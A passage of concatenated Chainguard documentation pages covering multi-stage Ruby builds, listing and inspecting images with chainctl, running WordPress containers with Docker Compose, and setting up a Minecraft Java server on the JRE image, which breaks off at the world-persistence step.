is the one that composes the final image. That’s why in our case it only adds two layers on top of the base cgr.dev/chainguard/ruby:latest image, containing the two COPY commands we use to copy the application files and its dependencies to the final image. It’s worth highlighting that no code or data is carried from one stage to the other unless you use a COPY command to explicitly copy it. This approach facilitates creating a slim final image with only what’s absolutely necessary to execute the application. Using a multi-stage build like this, without shell tools and interactive language interpreters built in also makes your final container image more secure. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Ruby Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Manage Chainguard Container Images with chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/chainctl-images/ Last Modified: March 6, 2025 Tags: chainctl, images, Product This page presents some of the more common ways to learn about the Chainguard container images that are available to you. We use chainctl images commands to list available repositories and container images, examine images more closely, and compare them to one another. For a full reference of all commands with details and switches, see chainctl Reference. List Available Chainguard Container Images When you want to know which Chainguard Containers are available to your account, use the following command: chainctl images list This will respond with a list of organizations available to your account. For most users, there will only be one entry in the list. This example shows an account with access to several organizations within the fictional MyCorp. Which organization would you like to list images from? > [MyCorp-prod] This group holds the production Chainguard Containers hosted under cgr.dev/MyCorp-prod [MyCorp-starter] This group holds the starter Chainguard Containers hosted under cgr.dev/MyCorp-starter [MyCorp-eval] This group holds the evaluation Chainguard Containers hosted under cgr.dev/MyCorp-eval Move the > up and down with the arrow keys and hit Enter to select the appropriate org. Then the command will return the list. Be warned, that list may take a while to generate and is likely to scroll past quickly in your command line terminal. You may prefer to direct the output into a file. Here’s an abbreviated example of what will be returned: ... ├ [python] │ ├ sha256:038449621d30e512645107e6b141fbfb5320d8f0caacd3d788e5a3be8da16def │ │ ├ [3.11] │ │ └ [3.11.12] │ ├ sha256:07756f3cf511a6227ae70d816c57b01a6fd9e805a587db5ebb4e17a5954b38c4 │ │ └ [3.11.9] │ ├ sha256:088b946519e5c766685e335366abe8a6160e3bd108a6525309f7186e943a4666 │ │ └ [3.11.9-dev] │ ├ sha256:09cb17be345eac82e3fdb017590d5907c582b4bd5ac86ed5e054bae739a9babd │ │ └ [3.13.0] │ ├ sha256:16b52893f316d9d7074b9c24c30f82eab1e94356461439d4be1a62fe229e6933 │ │ └ [3.12.7] │ ├ sha256:1b53a821fe44d699687d1ca2318e3f90fed4af97833ab40384ea77c746b54ed9 │ │ └ [3.10.16] │ ├ sha256:1c3e412aff5bddf54718d1bc0b4598ea30d18005e7dbfeb7e68bdae0f874682b │ │ ├ [3] │ │ ├ [3.13] │ │ ├ [3.13.3] │ │ └ [latest] ... This will continue until all images (like python above) are listed with all their variants (releases like 3.13.3). Notice that the list is not necessarily in order of release. List Available Container Repos For a list of image repositories available to your account, use: chainctl images repos list Examine the History of Container Images To examine the history of an image tag in chainctl, like when it was updated and the associated digests for each update, use chainctl images history. This will also return information such as how many times a variant has been built and for which platforms, along with the time and digests for each. To examine the history without using the menu shown earlier, use the optional --parent=$ORGANIZATION switch to designate your org, like this: chainctl images history $IMAGE:$TAG --parent=$ORGANIZATION For example, let’s find the history of one of the python image variants from our previous list, 3.12.7. So we enter: chainctl images history python:3.12.7 --parent=chainguard.edu The returned list is longer than is shown here, but here’s a useful excerpt: - time: 2024-11-29 08:11:03 UTC digest: sha256:16b52893f316d9d7074b9c24c30f82eab1e94356461439d4be1a62fe229e6933 architectures: amd64: sha256:755b79b43c1e76472cc467c4636bdb75bf4c2fcc551103087df0a4b0dc039164 (23.14 MB) arm64: sha256:d7dfaf24f292f490279611afcec49289aa528dba531590bebae059c7d3139ed6 (22.13 MB) - time: 2024-11-25 23:45:42 UTC digest: sha256:025bbe734f9bb3550ea845f028f28c76c6dff742527e2764f4ba40b3773ee4f8 architectures: amd64: sha256:c7b70882c6fe9b563aa5d5bdfb1a960c65b8c73e0830fc809ceb977e7f778e98 (23.14 MB) arm64: sha256:864f735794264120aabdc9eda9e1126140762e1c11eed96a89b0ab2056cc3662 (22.13 MB) - time: 2024-11-22 01:32:55 UTC digest: sha256:2a936c40669150e1a92e4c80b27410786925b8619c0ecc1679ec0a0f6b707235 architectures: amd64: sha256:8db3676319588dca04664a4a57c9fa464398fa2fc6874d5a1500273cabdbde04 (23.16 MB) arm64: sha256:ec8b8ef474ad6be50649cd9403882569d2cd1e71ac65e3bc263fc78aaef7608e (22.13 MB) ... - time: 2024-10-02 23:56:00 UTC digest: sha256:c7cf9f46124502b9e8aadf26b4c58e0cdbd5a08b0b97b6d3a451b89563a308e8 architectures: amd64: sha256:d4606173598e7103015b37dec4894771bf9cc221db6f7b102006eb81962c0696 (23.43 MB) arm64: sha256:f76a0a2f49418b030f3a31bcd2c8bddb8bbef7b006006aa59b74282955ab671d (22.41 MB) - time: 2024-10-01 23:40:56 UTC digest: sha256:0b0daf09eeb92741efe0eae51dbdeea5a66bed870e0e00895630de729b233b7f architectures: amd64: sha256:637af1b20e5f8cee7e538b07a1ae3934297769216a65acc454e34fac3dcd3828 (23.46 MB) arm64: sha256:8dce068942fa4dd155c87b6b8a3e4b8e2482a5fdb5232cb9dd73c39e63003038 (22.41 MB) The command returns a reverse-chronological history of when a specific tag was updated to point to a new manifest digest. If images are not multi-arch, only a single digest without architecture will be displayed. When the release version tag is not provided, the command will present you with a menu that lets you select which tag you’d like to obtain the history for. For example, if you enter: chainctl images history python --parent=chainguard.edu This will present you with a menu like this: Which tag of python would you like to view history for? > 3 3-dev 3.10 3.10-dev 3.10.14 3.10.14-dev 3.10.14-r2 3.10.14-r2-dev 3.10.14-r3 3.10.14-r3-dev 3.10.14-r4 3.10.14-r4-dev 3.10.14-r5 Once you make a selection, the details will be returned for that variant. Compare Chainguard Container Images When you want to compare two Chainguard images, enter: chainctl images diff $FROM_IMAGE $TO_IMAGE See How To Compare Chainguard Containers with chainctl to learn more. --- ### Getting Started with the WordPress Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/wordpress/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The WordPress Chainguard Container is a container image suitable for creating and running WordPress projects. Designed to work as a drop-in replacement for the official WordPress FPM-Alpine image, the Chainguard WordPress Container features a distroless variant for increased security on production environments. The image is built with the latest PHP and WordPress versions, and includes the necessary PHP extensions to run WordPress. In this guide, we’ll demonstrate 3 different ways in which you can use the WordPress Chainguard Container to build and run WordPress projects. Preparation This tutorial requires Docker to be installed on your local machine. If you don’t have Docker installed, you can download and install it from the official Docker website. Cloning the Demos Repository Start by cloning the demos repository to your local machine: git clone git@github.com:chainguard-dev/edu-images-demos.git Locate the wordpress demo and cd into its directory: cd edu-images-demos/php/wordpress Here you will find three folders, each with a different demo that we’ll cover in this guide. Example 1: Testing the Container Image with a Fresh WordPress Install You can use the latest-dev variant of the Chainguard WordPress Container to create a project from scratch and go through the installation wizard. This method is useful for testing th container image and getting familiar with its features, however, changes made to the WordPress installation will not persist unless you set up a volume with proper permissions to share container contents with the host machine. We’ll see how to do that in the next example. The files for this demo are located in the 01-preview directory. You can access this directory and open the docker-compose.yaml file in your editor of choice to follow along. Here’s the content of the docker-compose.yaml file from our first demo: services:app:image:cgr.dev/chainguard/wordpress:latest-devrestart:unless-stoppedenvironment:WORDPRESS_DB_HOST:mariadbWORDPRESS_DB_USER:$WORDPRESS_DB_USERWORDPRESS_DB_PASSWORD:$WORDPRESS_DB_PASSWORDWORDPRESS_DB_NAME:$WORDPRESS_DB_NAMEvolumes:- document-root:/var/www/htmlnginx:image:cgr.dev/chainguard/nginxrestart:unless-stoppedports:- 8000:8080volumes:- document-root:/var/www/html- ./nginx.conf:/etc/nginx/nginx.confmariadb:image:cgr.dev/chainguard/mariadbrestart:unless-stoppedenvironment:MARIADB_ALLOW_EMPTY_ROOT_PASSWORD:1MARIADB_USER:$WORDPRESS_DB_USERMARIADB_PASSWORD:$WORDPRESS_DB_PASSWORDMARIADB_DATABASE:$WORDPRESS_DB_NAMEports:- 3306:3306volumes:document-root:In this Docker Compose example, we define 3 services: app, nginx, and mariadb. Here’s a breakdown of each service: The app service uses the latest-dev variant of the Chainguard WordPress Container, and is configured to connect to the mariadb service. The entrypoint script in the WordPress container image looks for environment variables to set up a custom wp-config.php file. The volume document-root defines a volume that will be shared between the app and the nginx services. The nginx service uses the Chainguard nginx Container, and is configured to serve the WordPress application on port 8000. The mariadb service uses the Chainguard MariaDB Container, and is configured with the necessary environment variables to create a database for the WordPress application. The environment variables used in this example are defined in a .env file located in the same directory as the docker-compose.yaml file. To check for its contents, run: cat .env WORDPRESS_DB_HOST=mariadb WORDPRESS_DB_USER=wp-user WORDPRESS_DB_PASSWORD=wp-password WORDPRESS_DB_NAME=wordpress Although not necessary, you can change these values to suit your needs. Notice this is a hidden file and might not be visible in your file explorer, but you can open it in your terminal using a text editor like nano or vim. To start the services, run: docker compose up If you navigate to http://localhost:8000 in your browser, you should access the WordPress installation page. Follow the on-screen instructions to complete the WordPress setup. Keep in mind that any customizations will be lost once the environment is turned down. To stop the services, type CTRL+C in the terminal where the services are running, and then run: docker compose down This will remove the containers and networks created by the docker compose up command. In the next example, we’ll demonstrate how you can set up a volume with proper permissions to be able to persist customizations such as themes and plugins. Example 2: Customizing a New WordPress Installation To persist customizations made to your WordPress site, such as the installation of new themes and plugins, you’ll need to set up a volume with proper permissions in order to keep data between container rebuilds. This requires having a system user in the container with the same UID as your local system user on the host machine. To set this up, we’ll create a custom Dockerfile that adds a wordpress user with the specified UID (set to 1000 by default, which is typically the UID of a regular user on Linux-based systems) to the latest-dev variant of the Chainguard WordPress Container. The Dockerfile also changes default permissions on the /var/www/html directory to allow the wordpress user to write to it. Navigate to the 02-customizing directory to follow along. This is how the described Dockerfile included in this directory looks: FROMcgr.dev/chainguard/wordpress:latest-devARG UID=1000 USERrootRUN addgroup wordpress && adduser -SD -u "$UID" -s /bin/bash wordpress wordpressRUN chown -R wordpress:wordpress /var/www/htmlUSERwordpressIn the docker-compose.yaml file, we’ll reference the custom Dockerfile and pass the UID as a build argument: services:app:image:wordpress-local-devbuild:context:.dockerfile:Dockerfileargs:UID:1000user:wordpressrestart:unless-stoppedenvironment:WORDPRESS_DB_HOST:mariadbWORDPRESS_DB_USER:$WORDPRESS_DB_USERWORDPRESS_DB_PASSWORD:$WORDPRESS_DB_PASSWORDWORDPRESS_DB_NAME:$WORDPRESS_DB_NAMEvolumes:- ./wp-content:/var/www/html/wp-content- document-root:/var/www/htmlnginx:image:cgr.dev/chainguard/nginxrestart:unless-stoppedports:- 8000:8080volumes:- document-root:/var/www/html- ./nginx.conf:/etc/nginx/nginx.confmariadb:image:cgr.dev/chainguard/mariadbrestart:unless-stoppedenvironment:MARIADB_ALLOW_EMPTY_ROOT_PASSWORD:1MARIADB_USER:$WORDPRESS_DB_USERMARIADB_PASSWORD:$WORDPRESS_DB_PASSWORDMARIADB_DATABASE:$WORDPRESS_DB_NAMEports:- 3306:3306volumes:document-root:Only the app service has changed in this example. We’ve added a build section that references the custom Dockerfile, and we’ve set the UID build argument to 1000 by default. This can be overwritten at runtime when you call docker compose up. We’ve also added a volume share to persist the contents of the wp-content folder to the host machine. To build your custom container image and pass along your own UID as build argument, run: docker compose build --build-arg UID=$(id -u) app You should get output indicating that the container image was successfully built. Now you can get your environment up with: docker compose up Once the environment is up and running, you can access your WordPress installation from your browser at localhost:8000. If you go to another terminal window and check the contents of the 02-customizing/wp-content folder, you’ll notice that it was populated with the default WordPress themes and plugins: ❯ ls -la wp-content total 24 drwxrwxr-x 4 erika erika 4096 Jul 18 21:16 . drwxrwxr-x 3 erika erika 4096 Jul 18 21:15 .. -rw-rw-r-- 1 erika erika 14 Jul 18 21:05 .gitignore -rw-r--r-- 1 erika 65533 28 Jan 1 1970 index.php drwxr-xr-x 2 erika 65533 4096 Jul 18 21:16 plugins drwxr-xr-x 16 erika 65533 4096 Jul 18 21:16 themes This is only possible because of the custom Dockerfile we created, which added a wordpress user with the same UID as the local user on the host machine. You can now install new themes and plugins, and they will persist between container rebuilds. To stop the services, type CTRL+C in the terminal where the services are running, and then run: docker compose down In the next example, we’ll see how you can create a distroless WordPress runtime for your production environment. Example 3: Using the Distroless Variant of the WordPress Container Image This demo uses a multi-stage Docker build to create a final distroless container image to improve overall security. The distroless image contains the necessary dependencies to run WordPress and won’t allow for new package installations or shell access, reducing the image attack surface. The main difference here is that we’re calling the entrypoint script at build time instead of run time. This is done to ensure the image is self-contained and doesn’t rely on volumes set up within the host machine in order to work. Any customizations should be included in the wp-content folder that will be copied to the image at build time. Although this increases final image size due to the inclusion of custom content at build time, it limits what can be changed or added to the container image once it’s built. This demo includes a theme (Cue, a simple blogging theme) and a plugin (Imsanity, a popular plugin used to resize images) to demonstrate how to include custom content in the container image. Navigate to the 03-distroless directory to follow along. This is what the Dockerfile included in this directory looks like: FROMcgr.dev/chainguard/wordpress:latest-dev AS builder#trigger wp-config.php creationENV WORDPRESS_DB_HOST=foo #copy wp-content folderCOPY ./wp-content /usr/src/wordpress/wp-content#run entrypoint scriptRUN /usr/local/bin/docker-entrypoint.sh php-fpm --versionFROMcgr.dev/chainguard/wordpress:latestCOPY --from=builder --chown=php:php /var/www/html /var/www/htmlNotice that we’re copying the contents of the local wp-content folder to the /usr/src/wordpress folder in the container. This is the location of the WordPress source files. These will be copied to the document root by the entrypoint script that is executed right afterward. At the builder stage, we’re also setting up a single environment variable to trigger the creation of the wp-config.php file that relies on a set of environment variables to configure database access. In the docker-compose.yaml file, we reference the custom Dockerfile: services:app:image:wordpress-local-distrolessbuild:context:.dockerfile:Dockerfilerestart:unless-stoppedenvironment:WORDPRESS_DB_HOST:mariadbWORDPRESS_DB_USER:$WORDPRESS_DB_USERWORDPRESS_DB_PASSWORD:$WORDPRESS_DB_PASSWORDWORDPRESS_DB_NAME:$WORDPRESS_DB_NAMEWORDPRESS_CONFIG_EXTRA:|# Disable plugin and theme update and installation define( 'DISALLOW_FILE_MODS', true ); # Disable automatic updates define( 'AUTOMATIC_UPDATER_DISABLED', true );volumes:- document-root:/var/www/htmlnginx:image:cgr.dev/chainguard/nginxrestart:unless-stoppedports:- 8000:8080volumes:- document-root:/var/www/html- ./nginx.conf:/etc/nginx/nginx.confmariadb:image:cgr.dev/chainguard/mariadbrestart:unless-stoppedenvironment:MARIADB_ALLOW_EMPTY_ROOT_PASSWORD:1MARIADB_USER:$WORDPRESS_DB_USERMARIADB_PASSWORD:$WORDPRESS_DB_PASSWORDMARIADB_DATABASE:$WORDPRESS_DB_NAMEports:- 3306:3306volumes:document-root:You can now build and run your environment with: docker compose up --build The behavior of this WordPress setup should be similar to the previous examples, but this time, the container image is self-contained and doesn’t rely on volumes set up within the host machine to work, in addition to not allowing new package installations or login through a shell. We also set up the WORDPRESS_CONFIG_EXTRA environment variable to disable the installation of new themes and plugins, and to block automatic updates. This increases security by blocking file changes in the container. To stop the services, type CTRL+C in the terminal where the services are running, and then run: docker compose down To keep your WordPress installation up-to-date with latest versions, you can use digestabot, a GitHub Action that works in a similar way to Dependabot, sending a pull request to a repository whenever a new version of a container image is available. This will ensure you’re always running the most recent version of WordPress available in Wolfi. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose WordPress Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Setting Up a Minecraft Server with the JRE Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/jre-minecraft/ Last Modified: March 26, 2025 Tags: Chainguard Containers, Product Introduction Minecraft is an open-world game where players can build, explore, and adventure in a procedurally generated world. First released in 2011, it is the best-selling video game of all times, with a massive active userbase of 170 million monthly players as of 2024. Although single player mode is common, many players prefer to play together in multiplayer mode where they can join forces to tackle more complex projects. This typically requires setting up a remote server with the Minecraft server software, which runs on top of a Java runtime environment (JRE). In this guide, we’ll set up a Minecraft Java server using Chainguard’s JRE image for a low-to-zero CVE runtime environment. We’ll start with a basic setup that we’ll improve as we go through the guide. This guide will also explore a few different strategies to secure your containerized Minecraft server setup. Prerequisites To follow along, you will need Docker installed on the system where you want to run your Minecraft server. This can be a machine from your local network or a remote server. The Minecraft server software does not require a paid license or subscription, so you can download it for free. To test the server, however, you’ll need a copy of Minecraft Java edition, which is compatible with macOS, Linux, and Windows systems. Please note there are two versions of Minecraft: Java and Bedrock. In this tutorial we’ll be focusing on the Java version, which runs on all operating systems but doesn’t run on consoles. Create a new folder in your home directory where you’ll be working on your Minecraft server project: mkdir ~/minecraft-server cd ~/minecraft-server Unless otherwise specified, all commands from this guide should be executed from this folder. 1 – Creating a Basic Setup with Docker and Docker Compose We’ll start with a basic setup that we’ll improve in the next steps. Our first task is to set up a basic Dockerfile that is able to run the Minecraft Java server with default options, using cgr.dev/chainguard/jre:latest-dev as base image. This Dockerfile will: Install system dependencies as needed (curl, libudev) Add a regular system user named minecraft Set up the WORKDIR to /usr/share/minecrat Download the Minecraft Java server file Unpack the server.jar file Set up the eula.txt file using sed Configure the workdir permissions Change to the minecraft user Run the server Run the following command to create a Dockerfile containing all the steps previously described. cat > Dockerfile <<EOF FROM cgr.dev/chainguard/jre:latest-dev USER root RUN apk update && apk add curl libudev RUN adduser --system minecraft WORKDIR /usr/share/minecraft RUN curl -O https://piston-data.mojang.com/v1/objects/e6ec2f64e6080b9b5d9b471b291c33cc7f509733/server.jar RUN java -jar server.jar nogui RUN sed -i 's/false/true/' eula.txt RUN chown -R minecraft /usr/share/minecraft USER minecraft ENTRYPOINT ["java", "-jar", "/usr/share/minecraft/server.jar", "nogui"] EOF This command uses a heredoc input stream to create the described file without the need to use a text editor. We’ll also create a docker-compose.yaml file to facilitate running the container with additional settings, such as port forwarding. The following command will set up this file for you: cat > docker-compose.yaml <<EOF services: minecraft-java: image: cg-minecraft-server build: context: . restart: unless-stopped ports: - 25565:25565 EOF With both files set up, you are ready to run a test server. Start by building the image with: docker compose build [+] Building 0.1s (12/12) FINISHED docker:default => [minecraft-java internal] load build definition from Dockerfile 0.0s => => transferring dockerfile: 493B 0.0s => [minecraft-java internal] load metadata for cgr.dev/chainguard/jre:la 0.0s => [minecraft-java internal] load .dockerignore 0.0s => => transferring context: 2B 0.0s => [minecraft-java 1/8] FROM cgr.dev/chainguard/jre:latest-dev 0.0s => CACHED [minecraft-java 2/8] RUN apk update && apk add curl libudev 0.0s => CACHED [minecraft-java 3/8] RUN adduser --system minecraft 0.0s => CACHED [minecraft-java 4/8] WORKDIR /usr/share/minecraft 0.0s => CACHED [minecraft-java 5/8] RUN curl -O https://piston-data.mojang.co 0.0s => CACHED [minecraft-java 6/8] RUN java -jar server.jar nogui 0.0s => CACHED [minecraft-java 7/8] RUN sed -i 's/false/true/' eula.txt 0.0s => CACHED [minecraft-java 8/8] RUN chown -R minecraft /usr/share/minecra 0.0s => [minecraft-java] exporting to image 0.0s => => exporting layers 0.0s => => writing image sha256:80ff613188679a08b6c440d56e84689dd7a7b2b30535c 0.0s => => naming to docker.io/library/cg-minecraft-server 0.0s You can now run the server with: docker compose up You’ll get output with details of the server setup, such as the server version (1.21.5), game mode (survival), and port (25565). By default, this will spin up a new Minecraft world in survival mode with difficulty set to “normal”, and a random world seed, which means the world’s spawn area (where players first start when joining a new game) will be set by random. [+] Running 2/2 ✔ Network minecraft-server_default Created 0.1s ✔ Container minecraft-server-minecraft-java-1 Created 0.1s Attaching to minecraft-java-1 minecraft-java-1 | Starting net.minecraft.server.Main minecraft-java-1 | [13:58:04] [ServerMain/INFO]: Environment: Environment[sessionHost=https://sessionserver.mojang.com, servicesHost=https://api.minecraftservices.com, name=PROD] minecraft-java-1 | [13:58:05] [ServerMain/INFO]: No existing world data, creating new world minecraft-java-1 | [13:58:05] [ServerMain/INFO]: Loaded 1370 recipes minecraft-java-1 | [13:58:05] [ServerMain/INFO]: Loaded 1481 advancements minecraft-java-1 | [13:58:05] [Server thread/INFO]: Starting minecraft server version 1.21.5 minecraft-java-1 | [13:58:05] [Server thread/INFO]: Loading properties minecraft-java-1 | [13:58:05] [Server thread/INFO]: Default game type: SURVIVAL minecraft-java-1 | [13:58:05] [Server thread/INFO]: Generating keypair minecraft-java-1 | [13:58:05] [Server thread/INFO]: Starting Minecraft server on *:25565 minecraft-java-1 | [13:58:06] [Server thread/INFO]: Using epoll channel type minecraft-java-1 | [13:58:06] [Server thread/INFO]: Preparing level "world" minecraft-java-1 | [13:58:08] [Server thread/INFO]: Preparing start region for dimension minecraft:overworld minecraft-java-1 | [13:58:08] [Worker-Main-11/INFO]: Preparing spawn area: 2% minecraft-java-1 | [13:58:08] [Worker-Main-5/INFO]: Preparing spawn area: 2% minecraft-java-1 | [13:58:09] [Worker-Main-15/INFO]: Preparing spawn area: 18% minecraft-java-1 | [13:58:09] [Worker-Main-6/INFO]: Preparing spawn area: 51% minecraft-java-1 | [13:58:10] [Worker-Main-15/INFO]: Preparing spawn area: 51% minecraft-java-1 | [13:58:10] [Server thread/INFO]: Time elapsed: 2189 ms minecraft-java-1 | [13:58:10] [Server thread/INFO]: Done (4.333s)! For help, type "help" Now, from a Java Minecraft client running on the same local network as your server, access the Multiplayer menu and add a new server using your server’s local IP address and port 25565. If you are running the client on the same machine as the server, you can use localhost or 127.0.0.1 as server address: Tip: On Linux systems, you can use the following command to obtain your local IP address: ip -o route get to 8.8.8.8 | sed -n 's/.*src \([0-9.]\+\).*/\1/p' Click Done and select the new server from the list to connect. Your Docker Compose logs should indicate that a user has joined the game: minecraft-java-1 | [18:20:29] [User Authenticator #1/INFO]: UUID of player boredcatmom is xxxx-xxxx-xxxx-xxxx-xxxx minecraft-java-1 | [18:20:30] [Server thread/INFO]: boredcatmom[/192.168.178.41:37810] logged in with entity id 27 at (-184.5, 69.0, 67.5) minecraft-java-1 | [18:20:30] [Server thread/INFO]: boredcatmom joined the game Go around and explore, but keep in mind that because this setup is isolated and there are no volumes set, all changes will be lost when the containers are removed, and a new docker compose up would give you an entirely new world with a random initial spawn area. When you’re ready to continue, hit CTRL+C to stop the server. In the next step, we’ll improve your setup to facilitate server customization. 2 – Configuring the Server You now have a server that runs with default options, but we need to be able to customize some settings. Minecraft servers use a configuration file called server.properties, located in the root of the server directory (where you unpacked the original .jar file). In our setup, this file lives in the /usr/share/minecraft folder. One way to customize the server is by replacing the default server.properties file with one of your own at build time. The downside of this method is that whenever you change a setting, you’ll need to rebuild the image. Another method is to use environment variables at runtime to replace values in the configuration file using sed. This is more complex as it requires an entrypoint bash script in order to work, but it allows you to make changes to your configuration without rebuilding the image. We have implemented this method in the GuardCraft demo, so we’ll reuse the same script here. This bash script will: Look for any environment variables that start with the MC_ prefix Clear up the variable name in order to infer the configuration key in the server.properties file Obtain the value of the environment variable and use sed to replace original values with new values Finally, run the entrypoint command that should be passed as argument to the script ($0) For your reference, this is the script we’ll download from the GuardCraft demo repository: #!/usr/bin/env bash SERVER_PATH=/usr/share/minecraft # If MC_* ENV variables are set, update the server.properties file mcEnvs=( "${!MC_@}" ) if [ "${#mcEnvs[@]}" -gt 0 ]; then for mcConfig in "${mcEnvs[@]}"; do IFS='_' read -ra CONFIG <<< "${mcConfig}" key=${CONFIG[1]} if [ "${#CONFIG[@]}" -gt 2 ]; then for ((i=2; i<${#CONFIG[@]}; i++)); do key="${key}-${CONFIG[i]}" done fi value=${!mcConfig} echo "Setting $key=$value" sed -i "s~^$key=.*~$key=${value}~" $SERVER_PATH/server.properties done fi exec "$@" Now run the following command to download the script to your project folder: curl -O https://raw.githubusercontent.com/chainguard-dev/guardcraft-server/refs/heads/main/build-config.sh You’ll now edit your Dockerfile to copy the script to the image and replace the image’s entrypoint command. The script will run before the actual Java command that starts the server. Using a text editor of your choice, edit your Dockerfile so that it contains the following content: FROMcgr.dev/chainguard/jre:latest-devUSERrootRUN apk update && apk add curl libudevRUN adduser --system minecraftWORKDIR/usr/share/minecraftCOPY build-config.sh /usr/share/minecraft/RUN chmod +x /usr/share/minecraft/build-config.shRUN curl -O https://piston-data.mojang.com/v1/objects/e6ec2f64e6080b9b5d9b471b291c33cc7f509733/server.jarRUN java -jar server.jar noguiRUN sed -i 's/false/true/' eula.txtRUN chown -R minecraft /usr/share/minecraftUSERminecraftENTRYPOINT ["/usr/share/minecraft/build-config.sh", "java", "-jar" , "/usr/share/minecraft/server.jar", "nogui"]This adds a COPY statement to copy the new bash script we just created to the container’s WORKDIR, and changes the image’s entrypoint to use the script as a proxy to the Java command. This is a common Docker strategy for leveraging environment variables to configure containers at runtime. You’ll now edit your docker-compose.yaml file to include the environment variables that will customize your Minecraft server. You can refer to the official docs for all available options. In order to test the script, we’ll set some basic information and a level seed to choose the area in which players initially start the game. Open your docker-compose.yaml file and edit its contents so that it looks like this, with an additional environment section where you’ll set up your MC_ variables: services:minecraft-java:image:cg-minecraft-serverbuild:context:.restart:unless-stoppedports:- 25565:25565environment:# Server properties Set Up# MC_* variables will be replaced in the server.properties file# Hyphens must be replaced with underscoresMC_gamemode:"survival"MC_difficulty:"easy"MC_motd:"Welcome to GuardCraft!"MC_level_name:"GuardCraft"MC_level_seed:"69420018030897796"Before rebuilding your image, run the following command to remove the containers created in the last run: docker compose down Next, run the following command to rebuild the image and start a new environment with Docker Compose: docker compose up --build After the image is built and the container starts running, you should get output from the entrypoint script indicating which variables were set: ... minecraft-java-1 | Setting difficulty=easy minecraft-java-1 | Setting gamemode=survival minecraft-java-1 | Setting level-name=GuardCraft minecraft-java-1 | Setting level-seed=69420018030897796 minecraft-java-1 | Setting motd=Welcome to GuardCraft! ... minecraft-java-1 | [19:20:01] [Server thread/INFO]: Preparing level "GuardCraft" ... If you join the server now, you should spawn close to a nice village. 3 – Setting Up Automatic Updates Your server is now fully customizable through environment variables, but we’re still something important: updates. The Minecraft server download is statically defined in the Dockerfile, so it will go stale pretty quickly. We need a programmatic way to fetch the latest version of the server so that we don’t need to update the Dockerfile each time a new version of the server is out. Mojang (the company that makes Minecraft) has a few API endpoints that can be used to fetch available versions and their respective download artifacts. In the GuardCraft demo, we have implemented a bash script that fetches the latest version of the server .jar file, verifies its SHA-1 signature, and only then unpacks the file. We’ll implement the same script here. For your reference, this is the bash script we’ll download from the GuardCraft demo depository: #!/usr/bin/env bash # Script to download and install the Minecraft Java Server # Usage: server-download.sh [version] # If no version is provided, the latest version is used if [ -n "$1" ] && [ "$1" != "latest" ]; then version=$1 else version=$(curl -s https://launchermeta.mojang.com/mc/game/version_manifest.json | jq -r '.versions | first | .id') fi echo "Selected version $version..." version_url=$(curl -s https://launchermeta.mojang.com/mc/game/version_manifest.json | jq -r '.versions | map(select(.id == "'$version'")) | .[0] | .url') if [ -z "$version_url" ]; then echo "Version $versionnot found" exit 1 fi downloads=$(curl -s "$version_url" | jq -r '.downloads.server') server_url=$(echo "$downloads" | jq -r '.url') expected_sha1=$(echo "$downloads" | jq -r '.sha1') # Download the server jar curl -s -o server.jar "$server_url" # Verify the SHA-1 checksum downloaded_sha1=$(sha1sum server.jar | awk '{ print $1 }') if [ "$downloaded_sha1" == "$expected_sha1" ]; then echo "SHA-1 checksum verification passed." else echo "SHA-1 checksum verification failed." exit 1 fi # Unpacks the JAR and sets up eula.txt file java -jar server.jar nogui sed -i 's/false/true/' eula.txt Run the following command to download the script: curl -O https://raw.githubusercontent.com/chainguard-dev/guardcraft-server/refs/heads/main/server-install.sh Next, update the Dockerfile to use this script. You’ll need to make three changes: add an ARG to define the version of the server, using “latest” as default value include jq in the list of apks to install copy the server-install.sh file to the container and make it executable replace the installation section with a call to the server-install.sh script, passing $VERSION as argument Open the Dockerfile with an editor of your choice and replace its content with this updated version: FROMcgr.dev/chainguard/jre:latest-devARG VERSION="latest"USERrootRUN apk update && apk add curl libudev jqRUN adduser --system minecraftWORKDIR/usr/share/minecraftCOPY build-config.sh server-install.sh /usr/share/minecraft/RUN chmod +x /usr/share/minecraft/build-config.sh /usr/share/minecraft/server-install.shRUN /usr/share/minecraft/server-install.sh ${VERSION}RUN chown -R minecraft /usr/share/minecraftUSERminecraftENTRYPOINT ["/usr/share/minecraft/build-config.sh", "java", "-jar" , "/usr/share/minecraft/server.jar", "nogui"]With the argument in place, you can now choose at build time which version of the server you want to install. This is useful if you want to stick to a specific version due to compatibility with your Minecraft client. Now it’s time to test your upgraded setup. Stop any running containers and bring the environment down with the following command: docker compose down Then, execute the following to rebuild and run the environment: docker compose up --build You should be able to identify the server version in the output. At the time of this writing, the latest version is the stable release 1.21.5: ... minecraft-java-1 | [11:56:29] [ServerMain/INFO]: No existing world data, creating new world minecraft-java-1 | [11:56:30] [ServerMain/INFO]: Loaded 1373 recipes minecraft-java-1 | [11:56:30] [ServerMain/INFO]: Loaded 1484 advancements minecraft-java-1 | [11:56:30] [Server thread/INFO]: Starting minecraft server version 1.21.5 ... To join the server, a client must be running the same version (in this case, 1.21.5) of the game. If you run into issues, make sure you select “Latest Snapshot” in the Minecraft launcher before opening the game: If you want to specify the version of the Minecraft server, you can pass the VERSION argument at build time. For instance, this will install version 1.21.4: docker build --build-arg VERSION=1.21.4 . -t guardcraft-java You now have a containerized setup that automatically downloads the latest version of the Minecraft Java server (or a version of your choice), fully customizable through environment variables. There’s one last thing to take care of now: persisting world data. We’ll see how to go about that in the next step. 4 – Persisting World 